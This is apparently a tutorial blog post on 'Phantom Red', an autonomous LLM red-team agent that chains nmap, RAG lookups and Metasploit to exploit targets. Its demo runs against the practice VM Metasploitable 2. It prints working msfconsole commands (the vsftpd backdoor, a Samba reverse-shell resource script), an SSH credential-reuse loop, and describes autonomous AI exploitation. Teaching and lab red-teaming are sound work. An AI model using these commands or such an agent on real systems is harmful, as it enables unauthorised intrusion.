PhantomRed

Phantom Red is an AI-powered red team agent. You give it a target IP address, and it autonomously:

Think of it as a junior pentester that never sleeps, never forgets a CVE, and asks you to review the plan before pulling the trigger.

The Big Picture

Before we dive deep, here’s the 10,000-foot view. Phantom Red is built from four major pieces that work together:

┌─────────────────────────────────────────────────────────────┐
│                        PHANTOM RED                          │
│                                                             │
│  ┌──────────┐   ┌──────────┐   ┌──────────┐   ┌────────┐  │
│  │   LLM    │   │   RAG    │   │  Agent   │   │ Tools  │  │
│  │ (Brain)  │   │ (Memory) │   │ (Logic)  │   │(Hands) │  │
│  │          │   │          │   │          │   │        │  │
│  │ Qwen 2.5 │   │ChromaDB  │   │LangGraph │   │ nmap   │  │
│  │  Coder   │   │ + embed  │   │ pipeline │   │  msf   │  │
│  │ via      │   │          │   │ 10 nodes │   │  wsl   │  │
│  │ Ollama   │   │30+ CVEs  │   │          │   │  curl  │  │
│  └──────────┘   └──────────┘   └──────────┘   └────────┘  │
│                                                             │
│         All connected by Python + FastAPI + React          │
└─────────────────────────────────────────────────────────────┘

Each piece has a specific job. Let’s understand them one by one, starting from the fundamentals.

Part 1 — The Brain

How the LLM Works

You already know neural networks — inputs, weights, activations, outputs. An LLM (Large Language Model) is exactly that, but trained on a huge amount of text. It learns one thing really well: given this sequence of tokens, what token comes next?

The Transformer Architecture (Quick Refresher)

Your Prompt (tokens)
         │
         ▼
┌────────────────────┐
│  Token Embeddings  │  ← Each word → high-dimensional vector
│  + Positional Enc  │  ← Tells model where each word sits
└────────────────────┘
         │
         ▼
┌────────────────────┐
│  Self-Attention    │  ← "How much should I focus on each
│  (Multi-Head)      │     other word when processing THIS word?"
└────────────────────┘
         │
         ▼
┌────────────────────┐
│  Feed Forward NN   │  ← Standard dense layers (MLP)
└────────────────────┘
         │
    × N layers (Transformer Blocks)
         │
         ▼
┌────────────────────┐
│   Output Logits    │  ← Scores for every token in vocabulary
└────────────────────┘
         │
         ▼
    Next Token (sampled from softmax distribution)

The model repeats this — predicting one token at a time — until it generates a complete response. That’s autoregressive generation.

Why Qwen 2.5 Coder?

Phantom Red uses Qwen 2.5 Coder running locally via Ollama. Here’s why:

How Ollama Works

Ollama is basically a local server that serves LLM models via a simple HTTP API. LangChain talks to it like this:

Property	Benefit
Code-focused training	Understands bash, msfconsole, Python
Runs locally via Ollama	No API costs, no data leaving your machine
Fast enough on consumer GPU	Good balance of speed vs quality
Open weights	You can swap to llama3, mistral, etc.

# engine/agents.py
from langchain_ollama import OllamaLLM

self.llm = OllamaLLM(model="qwen2.5-coder", temperature=0.1)

temperature=0.1 means the model is conservative — it picks high-probability tokens rather than getting creative. For security tool planning, you want deterministic, not imaginative.

When the agent calls the LLM, it sends a carefully crafted prompt and gets back structured text:

Prompt:
  "You are an expert penetration tester.
   Services found: vsftpd 2.3.4 on port 21, Samba 3.0.20 on port 445...
   RAG vulnerabilities: CVE-2011-2523 vsftpd backdoor...
   Rank the top 3 attack vectors."

LLM Response:
  "1. vsftpd 2.3.4 backdoor (CVE-2011-2523) - CRITICAL...
   2. Samba usermap_script (CVE-2007-2447) - HIGH...
   ..."

Part 2 — The Memory

How RAG Works

Here’s the problem with a plain LLM: it’s frozen in time. It was trained up to some date and doesn’t know about new CVEs, and it can hallucinate exploit details it’s not sure about.

RAG (Retrieval-Augmented Generation) fixes this by giving the model a searchable knowledge base at runtime. Instead of relying purely on weights, the model looks things up before answering.

The RAG Pipeline

                    ┌─────────────────────┐
                    │   Query: "samba 3.0  │
                    │   exploit"           │
                    └──────────┬──────────┘
                               │
                               ▼
              ┌────────────────────────────────┐
              │  1. EMBED the query            │
              │                                │
              │  "samba 3.0 exploit"           │
              │         │                      │
              │         ▼                      │
              │  [0.23, -0.87, 0.44, ...]      │
              │  (384-dimensional vector)      │
              └────────────────────────────────┘
                               │
                               ▼
              ┌────────────────────────────────┐
              │  2. SEARCH ChromaDB            │
              │                                │
              │  Compare query vector against  │
              │  all stored document vectors   │
              │  using cosine similarity       │
              │                                │
              │  [doc1] similarity: 0.91  ← ✓ │
              │  [doc2] similarity: 0.87  ← ✓ │
              │  [doc3] similarity: 0.23       │
              │  [doc4] similarity: 0.12       │
              └────────────────────────────────┘
                               │
                               ▼
              ┌────────────────────────────────┐
              │  3. RETRIEVE top matches       │
              │                                │
              │  CVE-2007-2447: Samba          │
              │  usermap_script command        │
              │  injection via MS-RPC...       │
              │                                │
              │  Metadata:                     │
              │  - msf_module: exploit/multi/  │
              │    samba/usermap_script        │
              │  - payload: cmd/unix/reverse   │
              │  - port: 445                   │
              └────────────────────────────────┘
                               │
                               ▼
              ┌────────────────────────────────┐
              │  4. AUGMENT the LLM prompt     │
              │                                │
              │  "Here are relevant CVEs:      │
              │   [retrieved docs]             │
              │   Now plan the attack..."      │
              └────────────────────────────────┘

What is an Embedding?

An embedding is a way to convert text into a list of numbers (a vector) that captures the meaning of the text. Similar meanings end up as vectors that point in similar directions in high-dimensional space.

"vsftpd backdoor"   →  [0.21, -0.83, 0.44, 0.12, ...]
"ftp version 2.3.4" →  [0.19, -0.79, 0.41, 0.15, ...]  ← similar!
"apache web server" →  [0.91,  0.23, -0.55, 0.67, ...] ← different

ChromaDB uses sentence-transformers under the hood to compute these embeddings. When you search, it computes the embedding of your query and finds the stored documents whose embeddings are closest (by cosine similarity).

The Vulnerability Database

Phantom Red’s RAG database (engine/rag_engine.py) is pre-loaded with 30+ real CVEs, each stored with rich metadata:

# Simplified from rag_engine.py
VULN_DB = [
    {
        "id": "CVE-2011-2523",
        "desc": "vsftpd 2.3.4 backdoor - connects to port 6200, gives root shell",
        "meta": {
            "service": "ftp",
            "port": "21",
            "msf_module": "exploit/unix/ftp/vsftpd_234_backdoor",
            "arch": "cmd",
            "payload": "payload/cmd/unix/interact",
            "command_template": 'msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; ...'
        }
    },
    {
        "id": "CVE-2007-2447",
        "desc": "Samba 3.0.0-3.0.25rc3 username map script injection via MS-RPC",
        "meta": {
            "service": "samba",
            "port": "445",
            "msf_module": "exploit/multi/samba/usermap_script",
            ...
        }
    },
    # 28 more CVEs...
]

At startup, all entries are embedded and stored in ChromaDB at data/vuln_db/. This is persistent — the database survives restarts so it doesn’t re-embed everything every time.

# engine/rag_engine.py
class VulnRAGEngine:
    def __init__(self):
        self.client = chromadb.PersistentClient(path="data/vuln_db")
        self.collection = self.client.get_or_create_collection(
            name="vulnerabilities",
            embedding_function=embedding_functions.DefaultEmbeddingFunction()
        )
        self._auto_populate()  # Only adds missing entries

    def query_vulnerabilities(self, query_text, n_results=3):
        results = self.collection.query(
            query_texts=[query_text],
            n_results=n_results
        )
        return results

Part 3 — The Nervous System

How the Agent Works (LangGraph)

An agent is an AI system that can take actions, observe results, and decide what to do next. It’s not just a prompt → response; it’s a loop.

Agents vs Chains

CHAIN (simple, linear):
  Input → Prompt → LLM → Output
  (No decisions, no loops, no tools)

AGENT (smart, adaptive):
  Input → Think → Act → Observe → Think → Act → Observe → ... → Done
  (Can use tools, can loop, makes decisions)

What is LangGraph?

LangGraph is a library for building agents as state machines (directed graphs). Instead of one big loop, you define:

This gives you a deterministic, debuggable agent where you control exactly what happens at each step.

                        ┌─────────┐
           target_ip ──►│  RECON  │  nmap -sV scan
                        └────┬────┘
                             │ services discovered
                             ▼
                    ┌────────────────┐
                    │HTTP_FINGERPRINT│  curl headers, CMS detect
                    └───────┬────────┘
                            │ web tech stack
                            ▼
                    ┌───────────────┐
                    │  MSF_SEARCH   │  msfconsole search
                    └───────┬───────┘
                            │ available modules
                            ▼
                    ┌───────────────┐
                    │   RESEARCH    │  ChromaDB RAG query
                    └───────┬───────┘
                            │ matched CVEs + metadata
                            ▼
                    ┌───────────────┐
                    │   CVE_INTEL   │  NVD + ExploitDB lookup
                    └───────┬───────┘
                            │ live CVE data (read-only)
                            ▼
                    ┌───────────────┐
                    │    ANALYZE    │  LLM ranks entry points
                    └───────┬───────┘
                            │ attack surface analysis
                            ▼
                    ┌───────────────┐
                    │   PLANNER     │  Build exploit commands
                    └───────┬───────┘
                            │ ordered exploit plan
                            ▼
                    ┌───────────────┐
                    │   VALIDATE    │  RAG checks commands
                    └───────┬───────┘
                            │ validated command list
                            ▼
                    ┌───────────────┐
                    │    EXECUTE    │  Run in WSL Kali
                    └───────┬───────┘
                            │ shell obtained? → exit early
                            ▼
                    ┌───────────────┐
                    │  CRED_REUSE   │  SSH/Telnet with found creds
                    └───────┬───────┘
                            │
                            ▼
                         DONE ✓

The Shared State

Every node reads from and writes to a shared AgentState dictionary. Think of it as a baton being passed in a relay race:

# engine/agents.py (simplified)
class AgentState(TypedDict):
    target: str                      # "192.168.72.150"
    kali_ip: str                     # "192.168.72.1"
    recon_result: str                # raw nmap output
    services: List[Dict]             # parsed [{port, service, version}]
    http_fingerprint: Dict           # {url, server, cms, frameworks}
    vulnerabilities: List[str]       # RAG matched CVE descriptions
    vuln_metadata: List[Dict]        # RAG metadata (modules, CVEs)
    msf_candidates: List[Dict]       # live msfconsole search results
    cve_research: List[Dict]         # NVD + ExploitDB data
    analyst_cve_findings: str        # human analyst notes
    analysis: str                    # LLM attack surface summary
    exploit_plan: str                # LLM generated commands
    validated_commands: List[str]    # checked, safe-to-run commands
    executed_commands: List[Dict]    # run results + outputs
    discovered_creds: List[Dict]     # [{user, pass, source}]
    errors: List[str]

Each node is just a function that takes the state and returns a dict of updates:

# engine/agents.py (simplified)
def recon_node(self, state: AgentState) -> Dict:
    target = state["target"]

    # Run nmap
    result = self.nmap_tool.scan(target)
    services = self._parse_services(result)

    return {
        "recon_result": result,
        "services": services
    }

LangGraph takes care of merging these updates back into the shared state automatically.

Building the Graph

# engine/agents.py (simplified)
from langgraph.graph import StateGraph

graph = StateGraph(AgentState)

# Add nodes
graph.add_node("recon",            self.recon_node)
graph.add_node("http_fingerprint", self.http_fingerprint_node)
graph.add_node("msf_search",       self.msf_search_node)
graph.add_node("research",         self.research_node)
graph.add_node("cve_intel",        self.cve_intel_node)
graph.add_node("analyze",          self.analyze_node)
graph.add_node("planner",          self.planner_node)
graph.add_node("validate",         self.rag_validate_node)
graph.add_node("execute",          self.execution_node)
graph.add_node("cred_reuse",       self.credential_reuse_node)

# Add edges (define execution order)
graph.add_edge("recon",            "http_fingerprint")
graph.add_edge("http_fingerprint", "msf_search")
graph.add_edge("msf_search",       "research")
graph.add_edge("research",         "cve_intel")
graph.add_edge("cve_intel",        "analyze")
graph.add_edge("analyze",          "planner")
graph.add_edge("planner",          "validate")
graph.add_edge("validate",         "execute")
graph.add_edge("execute",          "cred_reuse")

# Set entry point
graph.set_entry_point("recon")

# Compile
self.app = graph.compile()

result = self.app.invoke(initial_state)

LangGraph walks the graph, calling each node in order, passing state along. Clean, debuggable, and modular.

Part 4 — The Hands

How Tools Work

An AI agent without tools is just a chatbot. Tools are what let it take real actions in the world — run commands, search databases, call APIs.

In Phantom Red, the tools are Python functions that the agent nodes call directly. Here are the main ones:

Tool 1: WSL Command Execution (engine/tools.py)

class WSLTool:
    def run_command(self, command: str, distro: str = "kali-linux",
                    timeout: int = None) -> str:
        """
        Runs a command inside WSL2 Kali Linux.

        Why WSL? Metasploit, nmap, and exploit tools run on Linux.
        Phantom Red itself runs on Windows, so we bridge via WSL2.
        """

        # Build: wsl -d kali-linux -- bash -c "..."
        full_cmd = ["wsl", "-d", distro, "--", "bash", "-c", command]

        result = subprocess.run(
            full_cmd,
            capture_output=True,
            text=True,
            timeout=timeout
        )
        return result.stdout + result.stderr

Windows (Python) ──── subprocess ────► WSL2 Kali Linux
                                             │
                                        nmap / msfconsole / curl
                                             │
                                        stdout/stderr ◄─────────

Tool 2: Nmap Scanner

class NmapTool:
    def scan(self, target: str) -> str:
        """
        -sV: detect service versions
        -F:  fast scan (100 common ports)
        -T4: aggressive timing
        """
        cmd = f"nmap -sV -F -T4{target}"
        return self.wsl.run_command(cmd, timeout=120)

PORT    STATE  SERVICE     VERSION
21/tcp  open   ftp         vsftpd 2.3.4
22/tcp  open   ssh         OpenSSH 4.7p1
139/tcp open   netbios-ssn Samba 3.0.20-Debian
445/tcp open   netbios-ssn Samba 3.0.20-Debian

Tool 3: CVE Research (engine/cve_research.py)

def search_nvd(service_name: str, version: str) -> List[Dict]:
    """Queries the National Vulnerability Database API."""
    url = f"https://services.nvd.nist.gov/rest/json/cves/2.0"
    params = {
        "keywordSearch": f"{service_name}{version}",
        "resultsPerPage": 10
    }
    response = requests.get(url, params=params)
    return parse_cve_data(response.json())

def search_exploitdb(service_name: str) -> List[Dict]:
    """Searches ExploitDB for public exploits."""
    url = f"https://www.exploit-db.com/search"
    params = {"q": service_name, "type": "local,remote,webapps"}
    ...

These give real-time data to complement the RAG database — important for new CVEs that weren’t in the training data.

Part 5 — The Full Pipeline

Step by Step: What Happens When You Run Phantom Red

Step 1: RECON Node

# Input: target = "192.168.72.150"
# Action: nmap -sV -F -T4 192.168.72.150

# Output:
services = [
    {"port": "21",  "service": "ftp",         "version": "vsftpd 2.3.4"},
    {"port": "22",  "service": "ssh",          "version": "OpenSSH 4.7p1"},
    {"port": "139", "service": "netbios-ssn",  "version": "Samba 3.0.20"},
    {"port": "445", "service": "microsoft-ds", "version": "Samba 3.0.20"},
    {"port": "80",  "service": "http",         "version": "Apache 2.2.8"},
    # ... more services
]

Step 2: HTTP_FINGERPRINT Node

# For port 80:
# Action: curl -I http://192.168.72.150

# Output:
http_fingerprint = {
    "url": "http://192.168.72.150",
    "server": "Apache/2.2.8 (Ubuntu)",
    "cms": "Mutillidae",   # detected from page body
    "frameworks": ["PHP/5.2.4"]
}

Step 3: MSF_SEARCH Node

# For each service, runs inside WSL:
# msfconsole -q -x "search vsftpd; exit"

# Parses output:
msf_candidates = [
    {
        "module": "exploit/unix/ftp/vsftpd_234_backdoor",
        "rank": "excellent",
        "description": "VSFTPD v2.3.4 Backdoor Command Execution"
    },
    ...
]

Step 4: RESEARCH Node (RAG Magic)

This is where RAG shines. For each service, the agent builds a query and searches ChromaDB:

# Query: "ftp vsftpd 2.3.4 exploit vulnerability"
# ChromaDB returns (by embedding similarity):

vulnerabilities = [
    "CVE-2011-2523: vsftpd 2.3.4 backdoor - contains a malicious backdoor...",
    "CVE-2014-3156: ProFTPD mod_copy unauthenticated file copy...",
]

vuln_metadata = [
    {
        "id": "CVE-2011-2523",
        "msf_module": "exploit/unix/ftp/vsftpd_234_backdoor",
        "command_template": 'msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; ...'
    }
]

Key filter: Results are filtered by port. If the RAG returns a web exploit but only FTP is open, it gets dropped.

Step 5: CVE_INTEL Node

Fetches live data from NVD and ExploitDB for analyst review. This is read-only — it doesn’t affect execution, it’s for a human to review.

Step 6: ANALYZE Node (LLM Reasoning)

You are an expert penetration tester analyzing a target system.

TARGET: 192.168.72.150

SERVICES FOUND:
- 21/tcp vsftpd 2.3.4
- 22/tcp OpenSSH 4.7p1
- 445/tcp Samba 3.0.20

RAG VULNERABILITIES:
- CVE-2011-2523: vsftpd 2.3.4 backdoor (cmd shell, port 21)
- CVE-2007-2447: Samba usermap_script injection (port 445)

AVAILABLE MSF MODULES:
- exploit/unix/ftp/vsftpd_234_backdoor [excellent]
- exploit/multi/samba/usermap_script [excellent]

Rank the top 3 attack vectors by exploitability and reliability.

ATTACK SURFACE ANALYSIS:

1. vsftpd 2.3.4 Backdoor (CVE-2011-2523) — CRITICAL
   Port 21 is open. vsftpd 2.3.4 contains a hardcoded backdoor
   triggered by ':)' in username. Metasploit module is rated excellent.
   Success rate: very high on unpatched targets.

2. Samba usermap_script (CVE-2007-2447) — HIGH
   Port 445 open with Samba 3.0.20 (vulnerable range: 3.0.0-3.0.25rc3).
   Command injection via MS-RPC. Excellent Metasploit module.

3. Apache mod_ssl OpenFuck (CVE-2002-0082) — MEDIUM
   Port 443 detection needed. Buffer overflow, older, less reliable.

Step 7: PLANNER Node

PRIORITY 1: Analyst-pasted commands (user knows best)
PRIORITY 2: RAG template commands (tested, verified metadata)
PRIORITY 3: LLM-suggested commands (creative but needs validation)

# Template:
'msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS {target}; ..."'

# After substitution:
'msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 192.168.72.150; ..."'

Some exploits use Metasploit resource scripts (.rc files) to avoid shell escaping issues:

# RC file content (written to Kali via WSL):
"""
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.72.150
set LHOST 192.168.72.1
set PAYLOAD cmd/unix/reverse
run
"""

# Command:
"msfconsole -r /tmp/samba_exploit.rc"

Step 8: VALIDATE Node

def rag_validate_node(self, state):
    for cmd in exploit_plan_commands:

        # Rule 1: Analyst commands pass through UNCHANGED
        if cmd.is_analyst_command:
            validated.append(cmd)
            continue

        # Rule 2: Reject unresolved placeholders
        if "{target}" in cmd or "{kali_ip}" in cmd:
            errors.append(f"Unresolved placeholder in:{cmd}")
            continue

        # Rule 3: Check against RAG metadata
        if has_invalid_option(cmd, vuln_metadata):
            # e.g., CMD= is marked invalid for this module
            cmd = remove_invalid_option(cmd)

        validated.append(cmd)

Step 9: EXECUTE Node

SUCCESS_PATTERNS = [
    r"session\d+ opened",    # Metasploit session
    r"meterpreter session",   # Meterpreter shell
    r"uid=\d+\(",             # Linux UID (shell obtained)
    r"spawning shell",        # Generic shell spawn
]

FAIL_PATTERNS = [
    r"exploit completed, but no session",
    r"connection refused",
    r"no route to host",
]

If uid=0(root) appears in output — success, stop all further commands. The agent got what it came for.

Step 10: CRED_REUSE Node

If credentials were discovered in exploit output (e.g., from a database dump or /etc/passwd), the agent tries them on SSH and Telnet:

def credential_reuse_node(self, state):
    for cred in state["discovered_creds"]:
        # Try SSH
        result = wsl.run_command(
            f'sshpass -p "{cred["password"]}" ssh{cred["user"]}@{target} "id"'
        )
        if "uid=" in result:
            log(f"SSH login succeeded:{cred['user']}@{target}")

Part 6 — The Code Explained

How Libraries Are Used Together

phantom_red/
│
├── main.py               ← CLI: python main.py 192.168.72.150
│    └── PhantomEngine.run()
│
├── api.py                ← FastAPI server (HTTP/SSE interface)
│    ├── POST /scan       → PhantomEngine.run()
│    ├── POST /execute    → PhantomEngine.execute_plan()
│    ├── GET  /stream     → Server-Sent Events (live logs)
│    └── POST /cve/search → cve_research.search_nvd()
│
└── engine/
     ├── agents.py        ← LangGraph StateGraph (10 nodes)
     │    ├── OllamaLLM   (langchain-ollama)
     │    ├── VulnRAGEngine (rag_engine.py)
     │    ├── NmapTool    (tools.py)
     │    └── WSLTool     (tools.py)
     │
     ├── rag_engine.py    ← ChromaDB + embeddings
     │    ├── chromadb.PersistentClient
     │    └── DefaultEmbeddingFunction (sentence-transformers)
     │
     ├── tools.py         ← WSL command execution
     │    └── subprocess.run(["wsl", "-d", "kali-linux", ...])
     │
     └── cve_research.py  ← HTTP requests to NVD + ExploitDB
          └── requests.get("https://services.nvd.nist.gov/...")

The Streaming Architecture

One of the coolest parts of Phantom Red is watching it work in real time. Here’s how that works:

Python Agent          FastAPI Server       React Frontend
     │                     │                    │
     │  _log("Scanning")   │                    │
     ├────────────────────►│                    │
     │                     │  SSE event         │
     │                     ├───────────────────►│
     │                     │                    │ append to log panel
     │  _log("Found FTP")  │                    │
     ├────────────────────►│                    │
     │                     │  SSE event         │
     │                     ├───────────────────►│

# api.py — SSE endpoint
@app.get("/stream")
async def stream_logs():
    async def event_generator():
        while True:
            if log_queue:
                msg = log_queue.popleft()
                yield f"data:{json.dumps({'msg': msg})}\n\n"
            await asyncio.sleep(0.1)

    return StreamingResponse(event_generator(), media_type="text/event-stream")

// ui/src/App.jsx — React client
const eventSource = new EventSource('/api/stream');
eventSource.onmessage = (event) => {
    const { msg } = JSON.parse(event.data);
    setLogs(prev => [...prev, msg]);
};

Part 7 — How it Finds Vulnerabilities

The vulnerability discovery pipeline uses three parallel approaches that reinforce each other:

                    TARGET SERVICES
                         │
          ┌──────────────┼──────────────┐
          │              │              │
          ▼              ▼              ▼
    ┌──────────┐   ┌──────────┐   ┌──────────┐
    │ RAG DB   │   │   LIVE   │   │  LIVE    │
    │ (local)  │   │  NVD API │   │ExploitDB │
    │          │   │          │   │          │
    │ 30+ CVEs │   │ NIST DB  │   │ public   │
    │ embedded │   │ CVSS     │   │ exploits │
    │ vectors  │   │ scores   │   │ PoC code │
    └────┬─────┘   └────┬─────┘   └────┬─────┘
         │              │              │
         └──────────────┼──────────────┘
                        │
                        ▼
              ┌──────────────────┐
              │  LLM SYNTHESIS   │
              │                  │
              │  Cross-reference │
              │  all sources     │
              │  Rank by         │
              │  exploitability  │
              └──────────────────┘

Together, they cover different gaps. The LLM synthesizes all three into a ranked attack plan.

The Semantic Search Advantage

The real power of RAG here is that you don’t need exact matches. Watch what happens when nmap returns “Samba 3.0.20-Debian”:

Source	Strength	Weakness
RAG DB	Fast, detailed metadata, offline	Fixed set of CVEs
NVD API	Comprehensive, official CVSS scores	Slow, rate-limited
ExploitDB	Real PoC exploits available	May not have all CVEs

Query text: "samba 3.0.20 Debian exploit vulnerability"

ChromaDB computes embedding → searches → finds:
  CVE-2007-2447: "Samba 3.0.0 through 3.0.25rc3 usermap_script injection"
  Similarity: 0.89 ✓

Even though version "3.0.20" != "3.0.0 through 3.0.25rc3" literally,
the semantic embedding understands they're in the same version range context.

This is the key insight of RAG — it finds contextually similar information, not just exact keyword matches.

Part 8 — How it Executes Exploits

The Execution Engine

All exploits run inside WSL2 Kali Linux. This is the architectural choice that makes everything work on Windows:

┌─────────────────────────────────────────────────────┐
│                    Windows Host                     │
│                                                     │
│  Python Agent ──── subprocess ────► WSL2 Kali      │
│                                          │          │
│                                     ┌───┴───────┐  │
│                                     │           │  │
│                                     │ msfconsole│  │
│                                     │ nmap      │  │
│                                     │ curl      │  │
│                                     │ sshpass   │  │
│                                     │           │  │
│                                     └───────────┘  │
│                                          │          │
│                                     Network         │
│                                          │          │
└──────────────────────────────────────────┼──────────┘
                                           │
                               ┌───────────▼───────────┐
                               │   Target VM           │
                               │   192.168.72.150      │
                               │   Metasploitable 2    │
                               └───────────────────────┘

The Command Flow for a Metasploit Exploit

1. PLANNER builds command from RAG template:
   ─────────────────────────────────────────
   msfconsole -q -x "
     use exploit/unix/ftp/vsftpd_234_backdoor;
     set RHOSTS 192.168.72.150;
     set RPORT 21;
     run;
     exit -y
   "

2. VALIDATE confirms:
   ─────────────────────────────────────────
   ✓ No unresolved placeholders
   ✓ Module is in valid RAG metadata
   ✓ RHOSTS is a valid option for this module
   ✓ exit -y present (prevents hanging)

3. EXECUTE runs via WSL:
   ─────────────────────────────────────────
   subprocess.run([
     "wsl", "-d", "kali-linux", "--", "bash", "-c",
     'msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; ..."'
   ], timeout=120)

4. Output classification:
   ─────────────────────────────────────────
   stdout: "... session 1 opened (192.168.72.1:4444 -> 192.168.72.150:6200)"

   check SUCCESS_PATTERNS:
   ✓ "session \d+ opened" → MATCHED

   Status: SUCCESS
   → Skip remaining exploits, go to CRED_REUSE

Resource Script Pattern (Advanced Exploits)

Some Metasploit modules need complex setup with multi-line configurations. Phantom Red writes these as .rc (resource script) files directly into Kali, then runs them:

# From agents.py — RC_FILE block handling
rc_content = """
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.72.150
set LHOST 192.168.72.1
set LPORT 4444
set PAYLOAD cmd/unix/reverse
run
exit -y
"""

# Write RC file directly to WSL filesystem
wsl.run_command(f'cat > /tmp/exploit_samba.rc << "EOF"\n{rc_content}\nEOF')

# Execute it
wsl.run_command("msfconsole -r /tmp/exploit_samba.rc", timeout=120)

Why use .rc files instead of inline -x commands? Because shell quoting becomes a nightmare when your exploit commands contain quotes, semicolons, and special characters. RC files sidestep the quoting problem entirely.

Part 9 — The UI

Watching it Work in Real Time

The React frontend (ui/src/App.jsx) gives you a real-time window into the agent’s brain:

┌─────────────────────────────────────────────────────────────────┐
│  PHANTOM RED                              [Scan] [Execute]       │
├───────────────────┬─────────────────────────────────────────────┤
│  TARGET INPUT     │  LIVE LOGS                                   │
│                   │                                              │
│  IP: 192.168.72.. │  [RECON] Starting nmap -sV -F -T4...        │
│  Analyst notes:   │  [RECON] Found 23 services                   │
│  [text area]      │  [HTTP] Apache/2.2.8 detected on port 80    │
│                   │  [MSF]  Found: vsftpd_234_backdoor [excel..] │
│  [SCAN]           │  [RAG]  CVE-2011-2523 matched (sim: 0.91)   │
│                   │  [NVD]  Fetching CVE data...                 │
├───────────────────┤  [LLM]  Analyzing attack surface...         │
│  CVE FINDINGS     │  [PLAN] Building exploit sequence...         │
│                   │  [EXEC] Running vsftpd backdoor exploit...   │
│  CVE-2011-2523    │  [EXEC] SUCCESS: session 1 opened!          │
│  CVSS: 10.0       │                                              │
│  Critical         ├─────────────────────────────────────────────┤
│                   │  EXPLOIT PLAN                                │
│  CVE-2007-2447    │                                              │
│  CVSS: 9.0        │  1. msfconsole -q -x "use exploit/unix...   │
│  High             │  2. msfconsole -r /tmp/samba_exploit.rc     │
│                   │                                              │
└───────────────────┴─────────────────────────────────────────────┘

The key technology here is Server-Sent Events (SSE) — a one-way stream from the server to the browser. The agent logs every step via self._log(msg), which pushes to a queue. The SSE endpoint drains that queue to the browser.

Key Libraries Explained

How it All Comes Together — The Mental Model

Library	What it Does	Why Used Here
langchain	LLM abstraction layer	Unified interface for prompts, chains, and models
langchain-ollama	Ollama LLM connector	Runs LLM locally — no API keys, no cloud
langgraph	Agent state machine	Deterministic, debuggable agent flow
chromadb	Embedded vector database	Persistent RAG storage, runs in-process
sentence-transformers	Text embeddings	Converts text → semantic vectors for similarity search
fastapi	REST API framework	Async Python web server with auto-docs
uvicorn	ASGI server	Runs FastAPI with async support
requests	HTTP client	CVE lookups from NVD/ExploitDB
python-nmap	Nmap Python wrapper	Network scanning (also used raw nmap output)
react + vite	Frontend framework	Fast dev server, component-based UI
framer-motion	React animations	Smooth UI transitions
tailwindcss	CSS utility framework	Fast styling without writing CSS

        ┌─────────────────────────────────────────────┐
        │                                             │
        │  PHANTOM RED is a student who:             │
        │                                             │
        │  1. Reads the exam (RECON)                 │
        │                                             │
        │  2. Checks the textbook (RAG)              │
        │     "I've seen vsftpd 2.3.4 before..."     │
        │                                             │
        │  3. Googles for new info (NVD/ExploitDB)  │
        │                                             │
        │  4. Thinks about the answer (LLM)          │
        │     "Best approach is probably X..."        │
        │                                             │
        │  5. Writes the answer (PLANNER)            │
        │                                             │
        │  6. Checks their work (VALIDATE)           │
        │                                             │
        │  7. Submits (EXECUTE)                      │
        │                                             │
        │  8. Uses what they learned (CRED_REUSE)   │
        │                                             │
        └─────────────────────────────────────────────┘

The LangGraph StateGraph is the skeleton that connects these steps.
The RAG database is the textbook the agent can look up.
The LLM is the reasoning engine that makes decisions.
The tools are the hands that take real actions.

Lessons Learned

Building Phantom Red taught me a lot about what makes AI agents actually work in practice:

1. LLMs hallucinate — RAG doesn’t

When I first built this with just an LLM, it would confidently generate Metasploit commands with wrong option names. CMD= when the module needs PAYLOAD=. Wrong port numbers. Invalid module paths.

Adding RAG with validated metadata stopped this cold. Now the LLM suggests the attack vector, but the actual command comes from a pre-verified template.

2. State machines beat ReAct loops for deterministic tasks

LangGraph’s explicit state graph was a better fit than a ReAct (reason + act) loop for this use case. Each step has a clear input and output, making it easy to debug (“why did PLANNER emit this command?”) and safe to reason about.

3. Analyst-in-the-loop is the killer feature

The ability for a human to paste notes (“try CVE-2002-0082, I already have a shell waiting on port 4444”) and have those treated as highest priority dramatically increased practical utility. The AI’s job changed from “figure everything out” to “fill in gaps around what the human knows.”

4. Prompt engineering is everything

The difference between the LLM giving useful ranked attack vectors vs. rambling prose came down entirely to the prompt structure. Breaking the prompt into clearly labeled sections (SERVICES, VULNERABILITIES, MSF MODULES, ANALYST NOTES) with explicit instructions about output format made a 10x difference.

5. Timeouts are non-negotiable

Msfconsole can hang indefinitely waiting for a connection that never comes. Without aggressive timeout handling (30s for quick checks, 120s for standard exploits, 180s for background jobs), the agent would freeze on the first failed exploit.

Tech Stack Summary

Backend:
  Language:   Python 3.11
  Agent:      LangGraph + LangChain
  LLM:        Qwen 2.5 Coder via Ollama (local)
  RAG:        ChromaDB + sentence-transformers
  API:        FastAPI + Uvicorn
  Security:   nmap, Metasploit (via WSL2 Kali)
  CVEs:       NVD API + ExploitDB

Frontend:
  Framework:  React 18 + Vite
  Styling:    Tailwind CSS
  Animation:  Framer Motion
  Icons:      Lucide React
  Streaming:  Server-Sent Events (SSE)

Infrastructure:
  Runtime:    Windows 11 + WSL2 Kali Linux
  LLM Server: Ollama (localhost:11434)

What’s Next

Live Example — Auto-Exploiting Metasploitable 2

This is a real run of Phantom Red against Metasploitable 2 (192.168.72.150), a purposely vulnerable Linux VM designed for security practice. The Kali attacker machine is at 172.28.255.59.

Setup

# Terminal 1 — Backend
venv\Scripts\activate
python api.py
# FastAPI server starts on http://localhost:8000

# Terminal 2 — Frontend
cd ui
npm run dev
# React dev server starts on http://localhost:5173

Open your browser to http://localhost:5173, enter the target IP and Kali IP, then click Initiate Agent.

What Phantom Red Did (Step by Step)

Step 1 — RECON: nmap Discovers 18 Open Services

The first thing the agent does is fire an nmap -sV -T4 scan. Metasploitable 2 is intentionally wide open:

PORT     STATE  SERVICE      VERSION
21/tcp   open   ftp          vsftpd 2.3.4
22/tcp   open   ssh          OpenSSH 4.7p1 Debian 8ubuntu1
23/tcp   open   telnet       Linux telnetd
25/tcp   open   smtp         Postfix smtpd
53/tcp   open   domain       ISC BIND 9.4.2
80/tcp   open   http         Apache httpd 2.2.8 (Ubuntu) DAV/2
111/tcp  open   rpcbind      2 (RPC #100000)
